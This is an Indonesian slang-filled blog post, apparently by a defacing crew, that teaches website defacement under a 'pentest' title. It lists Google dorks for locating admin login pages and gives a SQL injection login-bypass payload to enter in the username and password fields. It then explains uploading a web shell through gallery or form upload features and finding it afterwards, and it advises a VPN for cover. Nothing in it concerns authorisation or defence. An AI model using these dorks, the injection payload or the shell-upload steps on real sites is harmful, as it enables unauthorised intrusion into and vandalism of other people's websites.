Cara Pentest Web Dengan Bypass Admin

Exte Team

Deface dengan bypass admin

Halo semua ku datang lagi asique :v, kali ini gw mau share tentang Cara Deface Dengan Bypass Admin
langsung aja dimulai gausah lama - lama, emang mao ngapain lama lama hehe.

Bahan - bahan:

  • script deface. kalo belum punya bisa donlod disini jangan lupa tuh script lu edit dulu di notepad ea, ya x pake name gua :3
  • shell. gapunya juga? kere bgt lu jadi heker wkwk canda gan bisa donlod disini  password shell  IndoXploit ea lu coba aja oc :*
  • google, bingg, mojila, terserah lu mau pake apa kek internet explorer kek wkwk
  • vpn, biar apa? biar aman aja :v. pake vpn yg site indo aja, klo site luar mah gausah ngapaen takut :3

1. Dorking
"inurl:/administrator/login.php intext:username site:com"
"inurl:/administrator/login.php"
"inurl:/admin/index.php intext:username"
"inurl:/administrator/login.php intext:username
"inurl:/admin/main.php intext:username"
"inurl:/admin/login.html intext:login"
"inurl:/administrator/index.php intext:login"
"inurl:/adminweb/ intext:login.php"
 inurl:admin/login.php site:in
inurl:admin/login.html site:com
inurl:admin/login.aspx site:net                   ' Kembangin lagi ya dorknya  :* '
Gatau cara ngedorking? begini w jelasin cara dorking itu lu pilih salah satu teks diatas terus dicopy. paste kan teks tadi ke pencarian google.




2. Pilih salah satu website yang kalian pilih.
3. Masukin kode injeksi nya gan : ' or 1=1 limit 1 -- -+
    taruh kode injeksinya di username dan password, stelah itu klik log in.

4. horee masuk di dashboard :D, itu tandanya lu berhasil masuk jadi admin

5. Cari tempat upload file buat upload shell mu. biasanya ada dibagian gallery,add form,dll

6. cari tempat file shell mu biasanya di http://sitemu.com/files/shellmu.php

Doneeee!! 
Oke brada, segitu aja artikel gw wkwk mohon maaf klo ada salah kata yak :v , soalnya biar lu gak stress juga nyari site yg vuln itu kan susah makanya gw kasih candaan y walaupun kriuk ea wkwk.

Thanks for - Ollot2Ghost - and all defacer Indonesia :*